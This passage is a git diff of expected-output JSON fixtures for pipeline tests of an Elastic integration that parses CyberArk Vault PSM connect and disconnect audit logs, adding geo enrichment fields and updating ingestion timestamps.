Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:06\",\"IsoTimestamp\":\"2021-03-15T14:08:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", 
@@ -1540,17 +1720,35 @@
 }
 },
 "destination": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "address": "67.43.156.15",
 "user": {
 "name": "testark"
 },
- "address": "67.43.156.15",
 "ip": "67.43.156.15"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "address": "67.43.156.13",
 "user": {
 "name": "Administrator"
 },
- "address": "67.43.156.13",
 "ip": "67.43.156.13"
 },
 "tags": [
@@ -1633,7 +1831,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331207100Z", + "ingested": "2021-12-14T14:42:12.780172307Z", "original": "\u003c5\u003e1 2021-03-15T14:08:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:28\",\"IsoTimestamp\":\"2021-03-15T14:08:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "300", "kind": "event", @@ -1657,17 +1855,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -1750,7 +1966,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331210700Z", + "ingested": "2021-12-14T14:42:12.780172690Z", "original": "\u003c5\u003e1 2021-03-15T14:11:09Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:11:09\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:11:09Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:11:09\",\"IsoTimestamp\":\"2021-03-15T14:11:09Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "300", "kind": "event", @@ -1774,17 +1990,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -1867,7 +2101,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331215300Z", + "ingested": "2021-12-14T14:42:12.780173185Z", "original": "\u003c5\u003e1 2021-03-16T10:04:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 03:04:51\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T10:04:51Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 03:04:51\",\"IsoTimestamp\":\"2021-03-16T10:04:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "300", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log-expected.json index 43602b598e1..4861b30110e 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log-expected.json 
@@ -84,7 +84,7 @@ "event": { "severity": 2, "duration": 7000000000, - "ingested": "2021-12-09T13:36:49.813714300Z", + "ingested": "2021-12-14T14:42:15.678826962Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.7\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"admin2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating 
System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"No Reason\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"Tesla\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"302\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\",\"Station\":\"10.2.0.7\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"admin2\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"CPMDisabled\",\"Value\":\"No Reason\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Customer\",\"Value\":\"Tesla\"}]}}}}", "code": "302", "kind": "event", @@ -108,10 +108,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -195,7 +204,7 @@ "event": { "severity": 2, "duration": 13000000000, - "ingested": "2021-12-09T13:36:49.813723Z", + "ingested": "2021-12-14T14:42:15.678829402Z", "original": "\u003c5\u003e1 2021-03-11T17:38:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
